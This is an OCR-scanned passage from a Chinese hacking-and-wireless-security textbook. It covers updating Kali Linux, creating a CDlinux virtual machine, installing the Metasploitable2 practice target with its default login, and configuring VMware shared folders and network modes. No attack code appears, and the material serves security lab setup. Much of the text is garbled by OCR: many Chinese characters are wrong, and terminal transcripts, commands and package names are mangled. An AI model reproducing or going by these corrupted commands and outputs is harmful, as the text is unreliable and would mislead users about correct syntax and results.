初始 安装 的 Kali Linux 系 统 如 果 不 及 
时 更 新 是 无 法 使 用 的 ， 下 面 介绍 更 新 Kali 
Linux 系 统 的 方法 与 步骤 。 
双击 桌面 上 Kali Linux 系 统 的 终端 黑 
色 图 标 ， 如 下 图 所 示 。 


打开 Kali Linux 系 统 的 终端 设置 界 
面 ， 在 其 中 输入 命令 apt update， 然 后 按 
Enter 键 ， 即 可 获取 需要 更 新 软件 的 列表 ， 
如 下 图 所 示 。 


root@kali: ~ 


et 编辑 (E) 查看 (V) 搜索 (5S) 终 针 [TT) 二 助 [H) 
root@kali;-# apt update 

帘 中 :1 http://mirrors,neusoft.eduyu,.cn/kali kali-rolling InRelease 
正在 读 取 软件 包 列 表 .,.， 完成 

正在 分 析 软 件 包 的 依赖 关系 树 

正在 读 取 状态 恼 息 ..，. 完成 

有 62 个 软件 包 可 以 升级 。 请 执行 “apt List --upgradable 来 查看 它们 。 
rootGkatLi:-~## 国 


获取 完 更 新 列表 后 如 果 有 需要 更 新 
的 软件 ， 可 以 运行 apt upgrad 命 令 ， 如 下 图 
所 示 。 


rooveanali: ~# apT UPOT30E 
正在 读 职 软件 包 列 表 ,.， 完 成 
止 在 分 析 软 件 包 的 依 铝 关 条 和 树 


©@Q@e 


正在 读 取 状态 们 息 .,， 完 成 

正 企 计 莽 更 新 ..， 充 成 

下 列 软 件 包 是 自动 安装 的 并 且 现 在 不 写 村 了 : 
libavahi-gobjecte libgfortrans 

使 用 'apt autoremove' 来 知 城 它 (它们 ). 

下 列 【新 】 软 件 包 特 被 安装 ; 
lihagdhm6 python3-pycryptoronme 

下 列 软 件 包 的 版 本 烙 保 持 不 变 ; 
WDSCan 

下 列 软 件 包 的 被 升级 ; 
avahi-daemon dirnmnor qdbm- 18n oettext-base qirl.2-1s0N-1.90 gis 
gnome-user-docs gnupyg gnupg-1l19n gnupg-utils 9p9 gpg-39gent 
gpyq-wks-client gpg-wks-server gpgceony gpgsm gpgv libaprutili 
libaprutill-dbd-sqlite3 libaprutill-ldap libarpack2 
libavahi-clicntl3 LIbavahi-comon-dalLa Tileavahi-commor3 
11havah1-core7 lihavahi -glih!1 libavahi-gohjectea 11hclipsfilters1 
Libgdbm-compat4 Libgjs6g Libjson-gLib-1.9- 昌 
Libjson-0Lib-1.9-Common Libmn-Otiboe Libnolnx-mod-http-auth-panm 
Libnginx-mod-http-dav-ext libnginx-mod-http-echo 
libnoinx-mod-http-oeoip libnoinx-mod-http-image-filter 
Libnginx mod http subs filtcr Libnginx mod http upstrcom foir 
libnginx-mod-htrtp-xslt-T?1ilter libnqginx-mogd-mall 
libnginx-mod-stream libopenal-data libopenall 
libparted-?s-resizee libparted2 libperl5,.26 man-db modemnanager 
nginx-full parted perl perl-base python-attr python-tk 
pyLihon3-pLuginbasye Python3-pbysnmpD4 pylhon3- tk rsysloy sulmap 

升级 了 61 个 软件 包 , 新 安装 了 ? 个 软件 包 ， 要 和 皂 梧 8 个 软件 包 , 有 1 个 软件 包 来 被 升级 ， 

需要 下 载 8 B/46.,8 M6 的 和 归档， 

解 讨 决 后 会 湛 狂 18.8 MB 的 厦 外 宇 则 。 

您 希望 纶 纺 执 行 喇 ? [Y/n] ^R 


运行 命令 后 会 有 一 个 提示 ， 此 时 按键 
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盘 Y 键 ， 即 可 开始 更 新 ， 更 新 中 状态 如 下 图 
所 示 。 


奏 昔 甫 可 .../19-Uibgjs6g 1.52.4-T amd64.deb 
正在 将 Libgjs9g (1.52.4-1) 解 包 到 (1.52.3-2) 上 ... 
正 准 备 解 包 .../11-9js 1.52.4-1 amd64.deb 
正在 将 gjs (1.52.4-1) 解 包 到 (1.52.3-2) 上 ... 
正 准 备 解 包 .../12-gnome-user-docs 3.390.1-1 all.deb 
正在 将 gnome-user-docs (3.39.1-1) 解 包 到 (3.39.6-1) 上 ... 


税 注 意 : 由 于 网 络 原因 可 能 需要 多 执行 几 
次 更 新 命令 ， 直 至 更 新 完成 。 另 外 ， 如 果 
个 别 软 件 已 经 安装 并 存在 升级 版 本 问题 ， 
如 下 图 所 示 。 


rootg@kalLi:-# apt upgrade 

正在 恋 取 软件 包 列 表 ... 完成 

正在 分 析 软 件 包 的 依 环 关系 树 

正在 读 取 状态 信息 ... 完成 

正在 计算 更 新 ... 完成 

下 列 软 件 包 的 版 本 将 保持 不 变 : 
wpscan 


并 钳 了 "8 个 软件 包 ,新 安装 了 9 个 软件 包 ,要 色 可 9 个 软件 包 ,有 1 个 软件 包 未 入 升级 

这 时 ， 可 以 先 印 载 旧 版 本 ， 运 行 “apt- 
get remove < 软件 名 >” 命 令 ， 如 下 图 所 示 ， 
此 时 按键 盘 上 的 Y 键 即 可 郑 载 。 


root@kali:-# apt-get remove wpscan 
正在 读 取 软件 包 列 表 ..。. 完成 
正在 分 析 软 件 包 的 依赖 关系 树 
正在 读 取 状态 信息 ...- 完成 
下 列 软 件 包 是 自动 安装 的 并 且 现 在 不 需要 了 : 
ruby-ethon ruby-ffi ruby-ruby-progressbar ruby-terminal-table ruby-typhoeus 
ruby-unicode-display-width ruby-yajl 
恒 用 'apt autoremove' 来 邯 载 它 ( 它 们 )。 
下 列 软 件 包 将 被 【 邯 载 】: 
kati-Linux-fuLL wpscan 
升级 了 9 个 软件 包 ,新 安装 了 8 个 软件 包 , 要 扼 城 2 个 软件 包 , 有 8 个 软件 包 未 被 升级 。 
解 庄 绾 后 和 将 会 宝 出 267 k6 的 宝 间 。 
您 希望 继续 执行 吗 ? [Y/n] y 


卸载 完 旧 版 本 后 ， 可 以 运行 “apt-get 
install < 软件 名 >” 命 令 ， 如 下 图 所 示 ， 此 时 
按键 盘 上 的 Y 键 即 可 开始 安装 新 版 本 。 


rootekali:~# apt-get install wpscan 
正在 读 取 软 件 包 列表 ... 完成 
正在 分 析 软 件 包 的 依 束 关系 村 
正在 读 取 状 态 估 息 ... 完成 
下 列 软 件 包 是 自动 安装 的 并 且 现 在 不 需要 了 : 
ruby-terminal-table ruby-unicode-display-width 
使 用 'apt autoremove' 来 卸 坊 它 (它们 )。 
会 同时 安 蕉 下 列 软 件 ，; 
ruby-cms-scanner ruby-opt-parse-validator ruby-progressbar 
下 列 软件 包 将 被 【 务 载 】: 
ruby-ruby-progressbar 
下 列 【 新 】 软 忻 包 将 被 安装 : 
ruby-cms-scanner ruby-opt-parse-validator ruby-progressbar wpscan 
升级 了 日 个 软件 包 ,， 新 安装 了 4 个 软件 包 ， 要 彻 丧 1 个 软件 包 , 有 68 个 软件 包 未 被 升级 . 
需要 下 坦 9 B/112z kB 的 后 档 ， 
解压 缩 后 会 消耗 594 kB 的 柄 外 字 间 。 
您 希 蛙 继续 执行 吗 ? [Y/n] y 


最 后 ， 再 次 运行 apt upgrade 命令， 如 
果 显 示 无 软件 需要 更 新 ， 此 时 系统 更 新 完 
成 ， 如 下 图 所 示 oO 


root@kali:-# apt Upgrade 
正在 读 取 软件 包 列 表 ... 完成 
正在 分 析 软 件 包 的 尺 丈 关系 树 
正在 读 取 状态 信息 ... 完成 
正在 计算 更 新 ... 完成 
下 列 软 忻 包 是 自动 安装 的 并 且 现 在 不 需要 了 : 
ruby-terminal-table ruby-unicode-display-width 
使 用 'apt autoremove' 来 卸载 它 (它们 ). 
升级 了 9 个 软 忻 包 ， 新 安装 了 8 个 软件 包 ，, 要务 载 9 个 软件 包 , 有 9 个 软件 包 未 被 升级 。 


安装 CDlinux 系 统 


CDlinux 是 一 种 小 型 的 迷你 GNU/Linux 


ke 


3 


搭建 无 线 测试 系统 Kali Linux 


黑客 攻防 与 无 线 受 全 从 新 手 到 高 手 ( 超 值 版 ) 


动 操 作 系统 ”， 


发 行 版 软件 ， 其 名 称 取 自 英文 的 Compact- 
DistroLinux。 CDlinux 的 体形 小 巧 ， 功 能 
很 强大 。 


CDlinux 简 介 


使 用 者 可 以 把 CDlinux 看 作 是 一 个 “ 移 
把 它 装 到 随身 U 盘 中 ， 无 
论 走 到 哪里 ， 只 要 是 能 文 持 U 盘 局 动 的 计 
算 机 ， 就 可 以 插 上 U 盘 来 启动 CDlinux 操 
作 系 统 ， 从 而 把 这 台 计 算 机 变 成 自己 的 移 
动工 作 站 。 

CDlinux 里 集成 了 最 新 的 Linux 内 核 、 
Xorg 图 形 界 面 、Xfce 窗 口 管 理 器 以 及 很 多 
其 他 流行 软件 ， 如 Firefox 浏 览 器 、Pidgin 即 
时 通信 程序 、GIMP 图 像 处 理 程序 等 ， 这 就 
使 得 移动 工作 更 加 方便 。 

另外 ， 还 可 以 把 CDlinux 当 作 一 件 
随身 的 系统 修复 /维护 工具 。 这 是 因为 在 
CDlinux 标 准 版 里 集成 了 大 量 的 系统 修复 / 
维护 工具 ， 如 parted、partimage、part- 
clone、testdisk、foremost 和 等， 使 用 这 些 工 
具 完 全 可 以 满足 日 常 系统 维护 /修复 工作 的 

目前 ，CDlinux 对 简体 中 文 提供 全 面 文 
持 ， 这 极 大 地 方便 了 使 用 中 文 的 用 户 。 


| 单 去 VMware 应 拟 机 在 主页 中 有 “ 创 
A 


WORKSTATION 14 PRO™ 


进入 新 建 虚拟 机 向 导 对 话 框 选择 “ 典 
型 (推荐 ) ” 单 选 按钮 ， 如 右上 图 所 示 ， 
单 击 “ 下 一 步 ”按钮 。 
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欢迎 使 用 新 建 虑 拟 机 问 导 


] 4 您 宵 望 人 用 首 么 准 型 的 配置 ? 


WORKSTATION @ 暴 型 (推荐 )(T) 
per 通过 几 个 简单 的 步 巴 创 建 Workstation 14x 
虚拟 机 。 


〇 自 定义 (高 级 )(C) 
全 | 奸 带 有 5C5I 控 出局 闫 型、 虚拟 棋盘 类 型 
以 及 与 旧版 VMware 产品 兼容 性 等 咏 纹 先 帮 
的 虚拟 机 。 


mE 机 
在 “安装 客户 机 操作 系统 ”对 话 框 
中 ， 选 择 “ 安 装 程 序 光盘 映 象 (iso) ” 单 
选 按 和 钮 ， 并 为 其 添加 CDlinux 光 , 盘 文 件 ， 如 
下 图 所 示 ， 单 击 “ 下 一 步 ” 接 包 


安装 寄 户 机 操作 系统 
雇 拟 机 如 隔 物 理 机 ， 需要 操作 系统 ? 浆 将 如 何 专 装 客户 机 操作 系 坑 ? 


安装 来 产 : 
志 装 程序 光盘 (D) 


无 可 用 驱动 合 


四 安装 程序 光盘 职 像 文件 (so)(M): 
|D:\EaduNetdekDownioad\CDinux_0.9.7.1_Classic_SSE_! ~ | 


一” 无 寺 检 而 此 光 旦 歇 盆 中 的 些 作 系统 。 
您 需要 指定 要 支 法 的 操作 系 流 。 


避 精 后 安装 操作 系统 (5)。 
便 建 的 虚拟 机 将 包 言 一 个 空白 硬盘 。 


帮助 < 上 一 步 (B) 下 一 步 (N) > 取消 


在 “选择 客户 机 操作 系统 ”对 话 
框 中 选择 Linux 选 项 ， 版 本 中 选择 “其 他 
Linux2.6x 内 核 ”， 如 下 图 所 示 ， 单 击 “ 下 
一 步 ” 按 钮 。 


选择 容 户 机 探 作 系统 
此 虚拟 机 中 将 安装 哪 种 操作 系统 ? 


癌 记 机 控 作 系 纺 
O Microsof WIndows(W) 
®) LinuxtL) 
O Novell NetVare(E) 
O solars(S) 
O VMware ESX(X) 
D 〇 其 他 (0) 


版 本 {V) 
其 届 Linux 2.6.x 和 内核 ~ 


施肥 < 上 一 步 (8) 取消 

在 “命名 虚拟 机 ”对 话 框 中 单 击 “ 浏 
览 ” 按 钮 ， 为 虚拟 机 选择 一 个 保存 位 置 ， 
如 下 图 所 示 ， 单 击 “ 下 一 步 ” 按 钮 。 


第 3 章 ”搭建 无 线 测 试 系统 Kali Linux 


新 建 虚拟 机 向 导 在 配置 好 的 虚拟 机 局 动 界 面 ， 单 去 


命名 虚拟 机 [74 ~ 、 39 和 >» ”一 四 
人 开启 此 虚拟 机 ”按钮 ， 启 动 虚拟 机 ， 
下 图 所 示 。 
虚拟 机 名 称 (V): 
| 其 他 Linux 2.6.x 内 核 ] 其 他 Linux 2.6.x 内 核 
Pp Ftd 
位 置 (L): EH 响 旭 此 氢 4 1 
在 "编辑 ">" 首 选项 "中 可 更 改 默 认 位 置 。 eae 1 
© cD i 正在 使 用 文件 D:. 
竹 网 治 汀 本 器 NAT 
回 UB 性 岂 了 侠 达 
二 声卡 目 动 险 测 
融 打 秀 机 存在 
虱 呈 元 圳 兰 动 从 齐 
Ts 
< 上 一 步 (B) 下 一 步 (N) > 取消 > 虚拟 机 详 泗 信息 
TY 本 天 文 伯 ee 其 统 Linun 2.6.x 内 核 vmx 
ER 
“指定 磁盘 容量 ”界面 保持 默认 即 
I Py 在 虚拟 机 启动 过 程 中 可 以 选择 语言 环 
新 建 虚拟 机 向 导 二 ， 如 下 图 所 示 。 


指定 磁盘 容量 
磁盘 大 小 为 多 少 ? 


虚拟 机 的 硬盘 作为 一 个 或 多 个 文件 存 铺 在 主机 的 物理 磁盘 中 。 这些 文件 最 初 很 小 ， 随 着 您 
向 虚拟 机 中 汪 加 应 用 程序 、 文 件 和 数据 而 逐渐 变 大 。 


最 大 磁盘 大 小 《GB 儿 5 六 JE 


针对 其 他 Linux 2.6.x 内 核 的 建议 大 小 : 8 GB 


〇 将 虚拟 磁盘 存储 为 单个 文件 (0) 
图 将 虚拟 磁盘 拆 分 成 多 个 文件 (M) 
可 以 更 轻松 地 在 计算 机 之 间 移 动 虚拟 机 ， 但 可 能 会 降低 大 容量 磁盘 的 性 
[5 


帮助 < 上 一 步 (B) 取消 


至 此 便 配 置 好 了 CDlinux 系 统 ， 如 
单 击 “完成 ”按钮 完成 虚拟 机 
创建 。 


新 建 志 拟 机 向 导 


文件 系 贱 FeedingBottle 


已 准备 好 创建 虚报 机 
单 击 完成 创建 虚拟 机 。 然后 可 以 安装 其 他 Linux 2.6.x 内 核 。 


将 使 用 下 列 设 置 创 建 虚拟 机 : 
名 称 : 其 他 Linux 2.6.x 内 核 
位 置 : E:\CDlinux 
版 本 : Workstation 14.x 
操作 系统 : 其 他 Linux 2.6.x 内 核 
硬盘 : 8 GB, 拆 分 
内 存 : 256 MB 本 
网 络 适 配 强 : NAT 安 | 琶 国 yy SY “ qi 晤 18:46 时 休 
其 他 设备 : CD/DVD, USB 控制 器 , 打印 机 , 声卡 
自 定义 硬件 (CQ)..， 


3.4 ”安装 与 使 用 靶 机 
< 上 - 步 B) | 安 成 | | 取消 拿 到 局 域 网 权限 后 需要 后 续 的 渗透 
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黑客 攻防 与 无 线 巡 全 从 新 手 到 高 手 ( 超 值 版 ) 


测试 ， 这 里 选取 一 球 比 较 好 的 靶 机 一 一 
Metasploitable2， 该 靶 机 中 包含 了 大 量 的 系 
统 漏洞， 用 户 使 用 该 靶 机 不 仅 可 以 做 日 党 
的 无 线 网 络 安全 练习 ， 还 可 以 提高 自 喘 的 
安全 技术 。 


认识 靶 机 


;: Metasploitable 漏 洞 演 练 系统 ， 是 基于 

ubuntu 操作 系统 ， 本 映 设 计 作 为 安全 工具 测 
试 和 演示 第 见 漏 铜 攻击 ， dette 
作为 MSF 攻 击 用 的 靶 机 ， 它 是 一 个 具有 无 
数 未 打 补丁 漏洞 与 开放 了 了 无数 高 危 端口 的 
渗透 演练 系统 ， 可 以 使 我 们 进行 练习 。 

在 网 络 中 攻击 现实 中 的 主机 是 一 种 违 

法 行为 ， 一 旦 被 对 方 发 现 可 能 会 遭受 被 起 
诉 的 风险 。 因 此 使 用 Metasploitable 系 统 来 练 
习 ， 不 但 可 以 更 加 直观 地 感受 漏洞 利用 的 过 
程 ， 还 可 以 学 会 如 何 修 补 防御 这 些 漏洞 。 


目前 Metasploitable 已 经 推出 3 个 系 
列 ， 这 里 选用 Metasploitable2。 下 载 并 安装 
api 的 操作 步骤 如 下 : 


在 浏览 器 中 输入 http://sourceforge.net/ 
rie psd pnp 
网 址 ， 在 打开 的 页 面 中 找到 下 载 页 面 ， 如 
下 图 所 示 。 


Download Latest Version 


metasploitable-linux-2.0.0.zip (873.1 MB) 


单 击 下 载 页 面 中 的 下 载 按钮 ， 并 选择 

软件 的 保存 路 径 ， 下 载 完 成 后 会 有 一 个 名 

为 “metasploitable-linux-2.0.0.zip” 的 压缩 
包 文 件 ， 下 图 为 打开 压缩 包 的 状态 。 


《返回 | metasploitable-linux-2.0.0.zip\Metasploitable2-Linux 
名 称 + 大 小 修改 时 间 
而 | Metasploitable vmxf 269 B 2012-05-21 00:37:26 
| 本 Metssplcitablevmx 2.8 KB 2012-05-21 00:46:08 
[ Metasplcitablevmsd 67B 2012-05-21 00:46:08 
Metasploitable.vmdk 1.8 GB 2012-05-21 00:46:42 
国 Matssploitable.nvram 8.5 Ka 2012-05-21 00:45:50 


[step 图 将 该 压缩 包 文件 解压 到 磁盘 当中 ， 双 
击 打 开 该 目录 ， 查 看 解压 后 的 文件 是 否 缺 
少 ， 如 右上 图 所 示 。 
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名 称 - 修改 日 各 尖 开 大 小 

国 Metasploitable.nvram 2012/5/21 0:45 Mware 虚拟 机 .… B 
| 也 Metasploitable.vmdk 2012/5/21 0:46 \ 虐 拆 磁 1900.864... 
| 本 | Metasploiteble.vmsd 2012/5/21 0:46 VMware 洋 归 7... 1 KB 
Ll Metasploitable.vmx 2012/5/21 0:46 D e 虚拟 机 B 
| 四 Metasploitable.vmxf 2012/5/21 0:37 " re 组 成 员 1 KB 


税 注 意 : 这 里 存放 的 路 径 是 创建 虚拟 机 后 
的 路 径 ， 因 此 选择 一 块 空间 充足 并 且 便 于 
记 忆 的 位 置 o 


打开 wmware 虚 拟 机 ， 
主 界 面 ， 如 下 图 所 示 。 


进入 虚拟 机 的 


WORKSTATION 14 PRO™ 


十 加 的 


创建 新 的 虚拟 机 打开 虚拟 机 连接 远程 服务 器 


py 


单 击 “ 打 开 虚 拟 机 ”按钮 ， 打 开 “ 打 
开 ” 对 话 框 ， 在 其 中 找到 解压 目录 ， 如 下 
图 所 示 。 


回 打开 x 
t- - 个 | | «FFO... > Metasplokable2.. v 岂 搜索 "Mectasploitablc2-Linux"” 记 
组 织 ”新 建文 件 夫 FE 人 @ 
图 讽 叔 A ”名称 眉 改 日 其 类 型 
己 | 习 片 Mectasploitable.vmx 2012/5/21 0:46 
易 下 营 
小 音 禾 A > 
文件 各 (N): | | | 所 有 支持 的 文件 ~ 
EC 


选中 目录 中 的 虚拟 机 文件 ， 单 击 “ 打 
开 ” 按 钮 ， 这 样 便 创建 好 了 虚拟 机 ， 如 下 
图 所 示 。 


加] Metasploitable2-Linux 


|* 开局 此 专 拟 机 
二 | 讽 祖 走 拟 机 i 讼 叶 
[这 升级 此 记 拟 机 
v 设备 
三 让 512 MB 
口 处 型 总 1 
ee 右 雪 (SCSI 8 GB 
CDIDVD ID 日 自动 检 列 
网 网 阁 返 吕 骂 NAT 
罗网 次 渤 瑟 稀 2 公 主 机 模式 
图 ss 恩 3 器 存在 
赔 呈 示 问 振动 检 弄 
™ rig 术 


op s Metasplcitable2 (Linux}Metasploitable 


intentio' a a rable Linux virtual 
rr Be, This VIM 5 to conduc 
Security Ra tast securi al and 

practice commeon penetrat 

RE defa ep epee ssword js 


msfadmin:msfadmin. Never expose this JM to vw 虑 世 TS 己 


ted network [use NA HH nly 
mode it you have any questio th We De a sploitable2-Linux\Metasploitable, 
n 引 . To contact the develop E> se 硬 尾 荣 容 性 : Workstation 6.5-7x 让 税 机 
0 ermail to msfdev@metasploit.co 主 IP 地 址 : 网 党 合 写 不 可 后 


单 击 “开启 此 虚拟 机 ”按钮 ， 会 弹出 
一 个 对 话 框 ， 如 下 图 所 示 。 


Metasploitable2-Linux - VMware Workstation X 


<«? 此 虚拟 机 可 能 已 被 移动 或 复制 。 


为 了 枉 秆 特定 的 总理 和 网 络 功能 ，VMware Workstation 需要 知 
道 是 否 已 移动 或 复制 了 此 虚拟 机 。 


如 果 您 不 知道 ， 请 回答 我 已 复制 该 虚拟 机 (P) 。 


我 已 移动 该 虚拟 机 (M) ，| 我 已 复制 该 虚拟 机 (P) 取消 


单 击 “我 已 移动 该 虚拟 机 ”按钮 ， 
动 Metasploitable2， 
i 如 下 I No 


这 样 就 完成 了 靶 机 的 安 


:Ontact: sfdculan 


sfadn 


etasploitable login: 


移 注 意 : 虚拟 机 镜像 创建 的 虚拟 机 默认 账 
号 和 密码 均 为 mfsadmin， 可 以 通过 passwd 
命令 修改 密码 。 


[step 图 登录 进 虚 拟 机 以 后 建议 更 改 该 初始 密 
码 ， 修 改 密 码 使 用 passwd msfadmin 命 令 ， 
输入 完 命 令 后 会 要 求 输入 原始 密码 ， 原 始 
窗 码 输入 正确 后 会 要 求 输入 新 窗 码 ， 输 入 
两 次 一 样 的 密码 后 表示 修改 密码 完成 ， 如 
下 图 所 示 。 


sfadmin@metasploitable: 3 passwd msfadmii 
-hanging password for msfadmin. 


nter new UNIX password.: 
EtUpe new UNIX password.: 
You must choose a longer password 


Enter new UNIX 


全 注意 : Linux 系 统 中 输入 密码 是 不 显示 
的 ， 直 接 输入 即 可 ， 不 要 以 为 没有 输入 ， 
另外 ， 如 果 输 入 客 码 过 短 系 统 也 会 提示 要 
求 输入 一 个 较 长 的 密码 。 


aASSWOrd.: 


3.4.3 ” 靶 机 的 使 用 


靶 机 安装 完成 后 ， 就 可 以 使 用 该 靶 机 
了 ， 使 用 方法 非常 简单 。 启 动 虚拟 机 后 ， 
靶 机 系统 也 会 启动， 这 样 用 户 就 可 以 使 用 
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各 种 扫描 工具 来 扫描 靶 机 中 的 系统 漏洞 ， 
进入 演示 使 用 漏洞 攻击 系统 的 过 程 。 


舌战 演练 


实战 演练 1 一 一 设置 Kail 与 主机 共享 文件 夹 
通过 安装 虚拟 机 工具 设置 Kali 与 主机 实 
现 共享 文件 ， 具 体操 作 步 又 如 下 : 


在 VMware 工 具 栏 中 ， 选 择 “ 虚 拟 
机 ”菜单 项 ， 在 弹出 的 菜单 列表 中 选择 
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“设置 ”菜单 命令 ， 如 下 图 所 示 。 

| 虚拟 机 (M) 选项 不 T) 帮助 H) | 有 >| 性 

(1) ”电源 (P) 》 

可 移动 设备 (D) 》 
车 停 (U) Ctrl+Shift+P 

| 国 ” 发 送 Ctrl+Alt+Del(E) 

| 抓 取 输入 内 容 人 Ctrl+G 

| 癌 ” 快 照 (N) > 
捕获 屏幕 (C) Ctr|+Alt+PrtScn 

SN 管理 (M) > 
取消 VMware Tools 安装 (T) 

2| 设置 (S).-. KR Ctrl+D 


打开 “虚拟 机 设置 ”对 话 框 ， 选 择 
选项 ” 选项 卡 ， 并 在 “设置 ” 列表 中 选 
共享 文件 夹 ” 选 项 ， 如 下 图 所 示 。 


择 ,上 


详 忻 去 共 玛 

征 二 京 立 忻 实 关 持 你 的 妆 
eR 这 可 这 
时 向 必 共 X 作 去 

ei D' 

圈 总 旺 启用 伍 ) 

避 在 下 次 关机 或 挂 起 前 一 直 启 用 (U) 


件 显 示 车 虑 忆 机 中 
的 计算 机 机 元 捐 平 坟 
任 虚 羽 机 作用 亦 的 妾 所 


别 j 市 堆 Kasi-Linux-2018.<-vm-amd64 


园 vhware Tools 


局 |VNC 连接 已 健 用 立 御 去 [P) 

名 称 主机 路 全 
次 | 党 备 六 

局 > 自 引 影 好 不 次 支持 

一 | 记 冰 加 对 这 


未 加 (A)-… 


如 定 职 消 塌 助 


单 击 “ 添 加 ”按钮 ， 弹 出 “添加 共享 
文件 夹 向 导 ” 对 话 框 ， 如 下 图 所 示 。 
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黑客 攻防 与 无 线 受 全 从 新 手 到 高 手 ( 超 值 版 ) 


欢迎 使 用 浴 加 共享 文件 夹 问 时 


此 同 号 将 引号 您 完成 同 虚拟 机 湛 加 新 共享 文 
件 夹 的 步 台 。 


下 一 步 (N) > | 取消 


单 击 “ 下 一 步 ” 按 钮 ， 在 打开 的 “ 命 
令 共 享 文件 夹 ” 对 话 框 中 输入 文件 夹 名 
称 ， 并 选择 一 个 共享 文件 夹 路 径 ， 如 下 图 
所 示 。 


< 上 一 步 (8) 


命名 共享 文件 去 
如 何 命名 此 共享 文件 夹 ? 


主机 路 径 (H) 
| D:\ShareDir 


[EEC 


名 称 (A) 
ShareDir | 


< 上 一 步 (B) ”下 一 步 (N) > 取消 


单 击 “下 一 步 ” 按 钮 ， 进 入 “指定 
共享 文件 夹 属性 ”对 话 框 ， 指 定 共 享 文件 
夹 属性 ， 也 可 以 保持 默认 设置 ， 最 后 单 击 
“完成 ”按钮 ， 完 成 共享 文件 夹 的 设置 操 
作 ， 如 下 图 所 示 。 


指定 共享 文件 夫 属 性 
指定 此 共享 文件 来 的 范围 。 


其 他 属性 
回 启 用 此 共享 (E) 
口 品 谈 (R) 


< 上 -上 (8) 到 消 
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在 VMware 菜单 中 选择 “虚拟 机 ” 菜 
单项 ， 在 弹出 的 菜单 列表 中 选择 “重新 安 
装 VMware Tools” 和 选项， 如 下 图 所 示 。 


虚拟 机 (M) ， 选 项 上 (D 帮助 H) | 中 ~ | 台 | 奖 

(1) 电源 (P) > 

(®) 可 移动 设备 (D) 》 
车 停 (U) Ctrl+Shift+P 

c 发 送 Ctr|+Alt+Del(E) 
抓 取 输入 内 容 ( 

喇 ”快照 (N) > 
捷 获 屏幕 (C) Ctrl+Alt+PrtScn 


外 管理 (M) > 


Ctrl+G 


点 | 设置 (S)... Ctr| 十 D 


此 时 会 在 Kali 虚 拟 机 中 弹出 一 个 安装 
光盘 ， 打 开光 盘 后 ， 里 面 会 有 5 个 文件 ， 如 


下 图 所 示 。 
四 


@ VMware Tools ~ | Q | := 
rr 


10.2.5-8068393 tar. 
gz 


> 


< 


OO Recent 


让 Starred 三 二 


全 Home [] 


manifest.txt 


run_upgrader.sh 
而 Desktop 


[Y Documents 


四 Downloads 


/i Music 


vmware-tools- 
Upgrader-64 


怕 Pictures vmware-tools- 
Upgrader-32 


四 Videos 


本 Trash 


复制 压缩 包 文 件 “VMwareTools- 
10.2.5-8068393.tar.gz” 到 Downloads 目 录 
下 ， 如 下 图 所 示 。 


合 Home | Downloads ~ 


al@el:-|=leee 


> 


名 Recent 


a 


Starred 
划 


会 Home TOGZ 
VMwareTools- 
10.2.5-8068393.tar. 
gz 


画 Desktop 


DD Documents 


由 Music 
怕 Pictures 
四 Videos 


画 Trash 


@ VMwareToo- 全 


[step 图 选中 压缩 包 文件 ， 右 击 ， 在 弹出 的 快 
捷 菜 单 中 选择 “提取 到 此 处 ”菜单 命令 ， 
如 下 图 所 示 。 


国 用 归档 管理 器 打开 回 车 
使 用 其 他 程序 打开 (A) 
剪 切 OT) 

复制 (C) 

移动 到 .. 

复制 到 ... 

移 到 回收 站 (V) 而 | 除 
重 命名 (M).. F2 
提取 到 此 处 (E) 
提取 到 (X).. 
压缩 (Q)... 
收藏 

属性 (R) 


开始 解压 文件 夹 ， 解 压 完成 后 ， 在 内 
部 发 现 一 个 vmware-install.pl 文 件 ， 如 下 图 
所 示 。 


有 时 ee es | 
| 《 》| /VMwareTo.-5-8068393 | Vmware-tools-distrib v Q 


Ctrl+X 


Ctrl+| 


:=- -|=|eoe 
| 


站 最 近 使 用 
全 主 目录 
bin caf dorc 

面 挟 面 
DD Documents — 
®@ Downloads ee 
几 Music etc FILES INSTALL 
怕 Pictures 
茄 回收 站 

installer lib vgauth 


全 VMware Too.， 全 


#1 


vmware-install.pl 


光标 移动 到 文件 夹 空白 区 域 ， 右 击 ， 
在 弹出 的 快捷 菜单 中 选择 “在 终端 打开 ” 
菜单 命令 ， 如 下 图 所 示 。 
新 建文 件 夹 (F) 
粘贴 (P) 
全 选 (A) 

属性 (R) 

在 终端 打开 (E) 


这 时 在 终端 中 执行 ./ vmware-install.pl 
命令 ， 下 图 为 执行 效果 。 


root@kali:~/DownLoads/VMwareTools-10,2,5-6066393/vmWare-tools-distrib# ./vmware-install.pT 
he installer has detected an existing installation of open-vm-tools packages 

n this system and will not attempt to remove and replace these USer-5pace 
pplications, It is recommended to Use the open-vm-tools packages provided by 
he operating system, If you do not want to use the existing installation of 
pen-vm-tools packages and USe VMware Tools, you must uyninstall the 
pen-vm-tools packages and re-run this installer. 

he packages that need to be removed are: 

pen-vm- tools 

ackages must be removed with the --purge option. 

he installer will next check if there are any missing kernel drivers. Type yes 
f you want to do this, otherwise type no [yes] y 


十 其 他 位 置 


Shift+Ctrl+N 


Ctrl+A 
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[step 图 如 果 安 装 过 程 中 提示 [yes] ， 按 键 
盘 上 的 Y 键 或 Enter 键 直到 安装 完成 ， 安 装 完 
成 后 ， 在 mnt 目 录 中 会 多 出 一 个 共享 文件 夹 
hgfs， 如 下 图 所 示 。 


root@kali:/# cd mnt | 
root@kali: /mnt# ls 

hgfs 

root@kali:/mnt# cd hgfs 
root@kali:/mnt/hofs# ls 


a 
root@kali: /mnt/hgfs# cd ShareDir/ 
root@kali:/mnt/hgfs/ShareDir# 国 

实战 演练 2 一 一 设置 Kali 虚 拟 机 的 上 网 
万 式 

Kali 虚 拟 机 可 以 设置 3 种 网 络 模式 ， 设 


置 上 网 方式 的 操作 步骤 如 下 : 


在 VMware 菜单 项 中 ， 选 择 “ 虚 拟 
机 ” 二 网络 适配器 ” 一 “设置 ” 菜单 命 
令 ， 如 下 图 所 示 。 


WWM im RH | 有 “| 号 | 甩 - 史 | 四 局 王 总 | 加 


| BP 


rr 
DW CD/DVD (IDE) > 
] 区 施 (U) Cl+Shift+pP 
| 可 闪 ctl+Ak+DelE) Ee 
3 拉 家 边 入 内 容 (1) ctrl+G Pixart Imaging US8 Optical Mouse 》 
执 丈 天 三 (C) Cen+Ak+PrtScn 


打开 “虚拟 机 设置 ”对 话 框 ， 在 其 中 
选择 “网 络 适 配器 ”选项 ， 在 右 侧 可 以 看 
到 “网 络 连接 ”设置 界面 ， 这 里 提供 的 连 
接 方式 有 3 种 ， 如 下 图 所 示 。 


如 拉 委 WAS 

玫 内 本 4 G8 连 已 六 扩 (0) 
